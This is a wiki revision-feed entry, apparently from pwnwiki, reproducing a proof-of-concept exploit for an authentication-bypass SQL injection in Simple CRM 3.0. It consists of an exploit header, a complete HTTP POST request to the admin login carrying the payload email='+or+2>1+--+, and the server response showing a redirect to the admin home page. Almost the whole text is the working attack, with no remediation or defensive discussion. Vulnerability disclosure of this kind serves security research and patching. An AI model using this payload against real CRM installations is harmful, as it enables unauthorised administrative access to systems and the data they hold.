https://pwnwiki.com/index.php?action=history&feed=atom&title=Simple_CRM_3.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E Simple CRM 3.0 SQL注入漏洞 - Revision history 2026-04-14T23:16:18Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Simple_CRM_3.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=5574&oldid=prev Pwnwiki: Created page with "<pre> # Exploit Title: Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass) # Date: 22/06/2021 # Exploit Author: Rinku Kumar (rinku191) # Vendor Homepage: https://p..." 2021-06-24T01:11:43Z <p>Created page with &quot;&lt;pre&gt; # Exploit Title: Simple CRM 3.0 - &#039;email&#039; SQL injection (Authentication Bypass) # Date: 22/06/2021 # Exploit Author: Rinku Kumar (rinku191) # Vendor Homepage: https://p...&quot;</p> <p><b>New page</b></p><div>&lt;pre&gt;<br /> # Exploit Title: Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass) <br /> # Date: 22/06/2021<br /> # Exploit Author: Rinku Kumar (rinku191)<br /> # Vendor Homepage: https://phpgurukul.com/<br /> # Software Link: https://phpgurukul.com/small-crm-php/<br /> # Version: 3.0<br /> # Category: Webapps<br /> # Tested on: Apache2+MariaDB latest version<br /> # Description : Simple CRM suffers from SQL injection vulnerability, allowing an un-authenticated attackers to login into CRM admin panel.<br /> <br /> <br /> Vulnerable Page: /crm/admin/<br /> <br /> POC-Request<br /> -----------------------------------<br /> POST /scrm/crm/admin/ HTTP/1.1<br /> Host: 127.0.0.1<br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br /> Accept-Language: en-US,en;q=0.5<br /> Accept-Encoding: gzip, deflate<br /> Content-Type: application/x-www-form-urlencoded<br /> Content-Length: 35<br /> Origin: http://127.0.0.1<br /> Connection: close<br /> Referer: http://127.0.0.1/scrm/crm/admin/<br /> Cookie: PHPSESSID=oj0mohnmrt809ndld8pg1p9f14<br /> Upgrade-Insecure-Requests: 1<br /> <br /> email='+or+2&gt;1+--+&amp;password=&amp;login=<br /> <br /> ---------------------------------------<br /> POC-Response<br /> <br /> HTTP/1.1 200 OK<br /> Date: Tue, 22 Jun 2021 15:53:00 GMT<br /> Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33<br /> X-Powered-By: PHP/7.2.33<br /> Expires: Thu, 19 Nov 1981 08:52:00 GMT<br /> Cache-Control: no-store, no-cache, must-revalidate<br /> Pragma: no-cache<br /> Content-Length: 48<br /> Connection: close<br /> Content-Type: text/html; charset=UTF-8<br /> <br /> &lt;script&gt;window.location.href='home.php'&lt;/script&gt;<br /> <br /> &lt;/pre&gt;</div> Pwnwiki